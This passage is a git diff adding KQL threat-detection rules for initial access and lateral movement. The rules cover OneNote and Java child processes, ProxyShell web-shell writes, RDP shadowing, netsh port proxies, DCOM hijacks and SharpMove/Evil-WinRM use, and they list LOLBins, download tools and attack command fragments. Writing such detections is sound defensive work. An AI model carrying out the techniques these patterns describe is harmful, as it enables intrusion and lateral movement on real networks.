Access/suspicious_microsoft_onenote_child_process.kql new file mode 100644 index 00000000..4345d426 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Microsoft OneNote Child Process +// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) +// Date: 2022-10-21 +// Level: high +// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. +// MITRE Tactic: Initial Access +// Tags: attack.t1566, attack.t1566.001, attack.initial-access +// False Positives: +// - File located in the AppData folder with trusted signature + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql new file mode 100644 index 00000000..81f89dcd --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql @@ -0,0 +1,10 @@ +// Title: Suspicious MSExchangeMailboxReplication ASPX Write +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp") \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql new file mode 100644 index 00000000..a82d0bcd --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Processes Spawned by Java.EXE +// Author: Andreas Hunkeler (@Karneades), Florian Roth +// Date: 2021-12-17 +// Level: high +// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate calls to system binaries +// - Company specific internal usage + +DeviceProcessEvents +| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql new file mode 100644 index 00000000..b7e7d5e8 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Processes Spawned by WinRM +// Author: Andreas Hunkeler (@Karneades), Markus Neis +// Date: 2021-05-20 +// Level: high +// Description: Detects suspicious processes including shells spawnd from WinRM host process +// MITRE Tactic: Initial Access +// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation +// False Positives: +// - Legitimate WinRM usage + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql new file mode 100644 index 00000000..affdbcc2 --- /dev/null +++ b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Shells Spawn by Java Utility Keytool +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-12-22 +// Level: high +// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe" \ No newline at end of file diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/Initial Access/terminal_service_process_spawn.kql new file mode 100644 index 00000000..57da8f94 --- /dev/null +++ b/KQL/rules/Initial Access/terminal_service_process_spawn.kql @@ -0,0 +1,10 @@ +// Title: Terminal Service Process Spawn +// Author: Florian Roth (Nextron Systems) +// Date: 2019-05-22 +// Level: high +// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002 + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql new file mode 100644 index 00000000..6bdfddf3 --- /dev/null +++ b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql @@ -0,0 +1,12 @@ +// Title: User Added to Remote Desktop Users Group +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-06 +// Level: high +// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql new file mode 100644 index 00000000..462a905a --- /dev/null +++ b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql @@ -0,0 +1,12 @@ +// Title: Windows Registry Trust Record Modification +// Author: Antonlovesdnb, Trent Liffick (@tliffick) +// Date: 2020-02-19 +// Level: medium +// Description: Alerts on trust record modification within the registry, indicating usage of macros +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - This will alert on legitimate macro usage as well, additional tuning is required + +DeviceRegistryEvents +| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql new file mode 100644 index 00000000..84ea4948 --- /dev/null +++ b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql @@ -0,0 +1,12 @@ +// Title: Copy From Or To Admin Share Or Sysvol Folder +// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali +// Date: 2019-12-30 +// Level: medium +// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 +// False Positives: +// - Administrative scripts + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql new file mode 100644 index 00000000..8c969a5b --- /dev/null +++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql @@ -0,0 +1,11 @@ +// Title: HackTool - SharpMove Tool Execution +// Author: Luca Di Bartolomeo (CrimpSec) +// Date: 2024-01-29 +// Level: high +// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. + +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002 + +DeviceProcessEvents +| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql new file mode 100644 index 00000000..338ee2a6 --- /dev/null +++ b/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql @@ -0,0 +1,10 @@ +// Title: HackTool - WinRM Access Via Evil-WinRM +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql new file mode 100644 index 00000000..27dfae8a --- /dev/null +++ b/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql @@ -0,0 +1,10 @@ +// Title: MMC Spawning Windows Shell +// Author: Karneades, Swisscom CSIRT +// Date: 2019-08-05 +// Level: high +// Description: Detects a Windows command line executable started from MMC +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql new file mode 100644 index 00000000..92aa7343 --- /dev/null +++ b/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql @@ -0,0 +1,12 @@ +// Title: Mstsc.EXE Execution From Uncommon Parent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql new file mode 100644 index 00000000..8e079b84 --- /dev/null +++ b/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql @@ -0,0 +1,13 @@ +// Title: New Port Forwarding Rule Added Via Netsh.EXE +// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel +// Date: 2019-01-29 +// Level: medium +// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activity +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) + +DeviceProcessEvents +| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c=")) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql new file mode 100644 index 00000000..0804f14d --- /dev/null +++ b/KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql @@ -0,0 +1,13 @@ +// Title: New PortProxy Registry Entry Added +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-06-22 +// Level: medium +// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) +// - Synergy Software KVM (https://symless.com/synergy) + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql new file mode 100644 index 00000000..db0ceee6 --- /dev/null +++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql @@ -0,0 +1,14 @@ +// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. +Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. + +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001 +// False Positives: +// - WSL (Windows Sub System For Linux) + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql new file mode 100644 index 00000000..03f89a4b --- /dev/null +++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql @@ -0,0 +1,14 @@ +// Title: Outbound RDP Connections Over Non-Standard Tools +// Author: Markus Neis +// Date: 2019-05-15 +// Level: high +// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. +An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. + +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 +// False Positives: +// - Third party RDP tools + +DeviceNetworkEvents +| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ ""))) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql new file mode 100644 index 00000000..3ec120ed --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql @@ -0,0 +1,10 @@ +// Title: Potential DCOM InternetExplorer.Application DLL Hijack +// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga +// Date: 2020-10-12 +// Level: critical +// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql new file mode 100644 index 00000000..1a20a4ef --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql @@ -0,0 +1,10 @@ +// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load +// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga +// Date: 2020-10-12 +// Level: critical +// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003 + +DeviceImageLoadEvents +| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql new file mode 100644 index 00000000..ba3cdbcd --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql @@ -0,0 +1,11 @@ +// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp +// Author: Aaron Stratton +// Date: 2023-11-13 +// Level: high +// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. + +// MITRE Tactic: Lateral Movement +// Tags: attack.t1021.003, attack.lateral-movement + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql new file mode 100644 index 00000000..1d58721a --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql @@ -0,0 +1,13 @@ +// Title: Potential Lateral Movement via Windows Remote Shell +// Author: Liran Ravich +// Date: 2025-10-22 +// Level: medium +// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. + +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1021.006 +// False Positives: +// - Legitimate use of WinRM within the organization + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql new file mode 100644 index 00000000..86dc13f4 --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential MSTSC Shadowing Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-24 +// Level: high +// Description: Detects RDP session hijacking by using MSTSC shadowing +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1563.002 + +DeviceProcessEvents +| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql new file mode 100644 index 00000000..a709c271 --- /dev/null +++ b/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql @@ -0,0 +1,10 @@ +// Title: Potential 